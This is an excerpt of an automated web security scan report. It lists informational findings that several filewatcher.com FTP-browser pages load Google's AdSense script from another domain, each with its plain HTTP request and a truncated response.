Content-Length: 7818
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 699
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ - FTP Browser</tit
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.795. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/15.192.45.22/ftp1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BhY/ik4C6r1K3CcImXBENw"
Content-Length: 5627
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 723
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/ - FTP Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.796. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/15.192.45.22/ftp1/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "nhxZk4J68kggWkoG7viSiA"
Content-Length: 19811
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 730
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/pub/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.797. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1/pub/alphaserver.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/15.192.45.22/ftp1/pub/alphaserver.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1/pub/alphaserver.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kMFMZ9KkXiatn10YtUlJkQ"
Content-Length: 6861
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 736
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/pub/alphaserve
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.798. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3fD4hVyrzgKw3kQzPsbSdA"
Content-Length: 22498
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 738
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/pub/alphaserve
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.799. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive/graphics.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive/graphics.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive/graphics.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vVp/1zmCAc1/DYG91uMeOQ"
Content-Length: 19211
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 738
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/pub/alphaserve
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.800. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Payo2AbeQ221Ft6IxSGWBw"
Content-Length: 7468
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 670
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/ - FTP Brows
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.801. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7w/tfdbs73Vm2ZLWD8boeg"
Content-Length: 5711
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 672
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/ - FT
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.802. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "nU9TQmBxJbbi4V3QwAD6GQ"
Content-Length: 5569
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 676
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.803. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "blvDUvsPVdQEUjg3PY/8ZQ"
Content-Length: 5783
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 677
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.804. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "TIo7PLagRCyM6CpbM3Dr3g"
Content-Length: 7233
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 679
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.805. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "oXffTp+d/rEJ1/zeDZ8TwA"
Content-Length: 9720
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 677
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.806. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "UaEea18oiR0XV8sif5T9Ug"
Content-Length: 27743
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 678
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.807. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HjInCKS2ULVV3OxfDNv03g"
Content-Length: 52274
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 682
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.808. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:58 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "B0RAB9cnjoQQFlID4J4meQ"
Content-Length: 14074
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 684
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.809. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:58 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "g1bWRbPFJMeBdjXQR9u05g"
Content-Length: 8543
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 685
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.810. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "y3tQ+F7TYkyukCQ5FSG8BA"
Content-Length: 8708
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 684
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.811. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
